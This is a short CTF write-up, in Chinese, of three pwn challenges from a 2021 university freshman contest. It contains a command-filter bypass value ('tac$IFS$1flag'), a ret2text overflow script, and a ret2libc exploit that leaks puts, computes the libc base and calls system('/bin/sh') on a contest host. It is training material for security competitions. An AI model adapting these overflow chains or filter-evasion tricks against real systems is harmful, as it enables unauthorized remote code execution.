SWPU新生赛2021 Pwn部分WriteUp

第一波放题

nc签到

不能有’cat’,‘ls’,’ ‘,‘cd’,‘echo’,’<’,’${IFS}’
这很web
直接绕就行
tac$IFS$1flag

gift_pwn

ret2text

from pwn import *
p = remote('1.14.71.254','28057')
p.sendline('a'*(0x10+8)+p64(0x4005b6))
p.interactive()

whitegive_pwn

ret2libc3

from pwn import *
p = remote('1.14.71.254','28113')
elf = ELF('./pwn3')

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
start_add = elf.symbols['_start']

pop_rdi = 0x400763
payload1 = 'a'*(16+8) + p64(pop_rdi) +p64(puts_got) + p64(puts_plt) + p64(start_add)
p.sendline(payload1)

puts_add = u64(p.recv(6).ljust(8,'\x00'))
print(hex(puts_add))

libc_base = puts_add - 0x06f6a0
system_add=libc_base+0x0453a0
binsh=libc_base+0x18ce57

payload2 = 'a'*(16+8) + p64(pop_rdi) + p64(binsh)+ p64(system_add)
p.sendline(payload2)
p.interactive()